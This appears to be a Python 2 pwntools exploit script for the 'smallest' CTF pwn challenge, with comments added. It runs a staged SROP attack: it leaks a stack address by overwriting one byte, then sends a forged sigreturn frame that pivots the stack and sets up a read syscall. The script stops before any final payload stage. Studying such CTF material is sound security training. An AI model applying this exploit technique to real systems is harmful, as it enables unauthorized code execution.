# Exploit script for the 'smallest' pwn challenge (SROP-style), written against
# Python 2 pwntools: str and bytes are mixed freely below (e.g. 'a' * 8 + str(sigframe)),
# which is a Python 2 idiom and not valid on Python 3.
# NOTE(review): LibcSearcher is imported but not used anywhere in this excerpt.
from pwn import *
from LibcSearcher import *

small = ELF('./smallest')

# Remote target is hard-coded; the commented-out process() line is the local-debug alternative.
sh = remote('node4.buuoj.cn',29624)
# sh = process('./smallest')
context.arch = 'amd64'
# 'debug' makes pwntools print every byte sent and received (noisy, but useful to verify each stage).
context.log_level = 'debug'

# Two fixed addresses in the (non-PIE) binary used by every stage below.
syscall_ret = 0x00000000004000BE
start_addr = 0x00000000004000B0

## Stage 1: write start_addr three times (3 * 8 = 24 bytes).
payload = p64(start_addr) * 3
sh.send(payload)
sleep(1)

## Stage 2: modify the return addr to start_addr+3
## so that the xor rax,rax is skipped; then rax=1
## and a stack addr is read back.
# A single byte 0xb3 overwrites only the lowest byte of the saved start_addr
# (0x4000B0 -> 0x4000B3).
sh.send('\xb3')
# Bytes 8..16 of the received buffer are interpreted as a little-endian 64-bit stack address.
stack_addr = u64(sh.recv()[8:16])
log.success('leak stack addr :' + hex(stack_addr))
sleep(1)

## Stage 3: make rsp point to stack_addr.
## The frame describes read(0, stack_addr, 0x400), with rsp=stack_addr and rip=syscall_ret.
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_read
sigframe.rdi = 0
sigframe.rsi = stack_addr
sigframe.rdx = 0x400
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
# Layout: start_addr, 8 bytes of padding, then the serialized frame
# (str(sigframe) relies on Python 2 str/bytes equivalence).
payload = p64(start_addr) + 'a' * 8 + str(sigframe)
sh.send(payload)
# gdb.attach(sh)
# raw_input()
sleep(1)

## Stage 4: set rax=15 and call sigreturn.
# The payload is exactly 8 + 7 = 15 bytes; the author's comment indicates this
# length is what lands in rax.
sigreturn = p64(syscall_ret) + 'b' * 7
sh.send(sigreturn)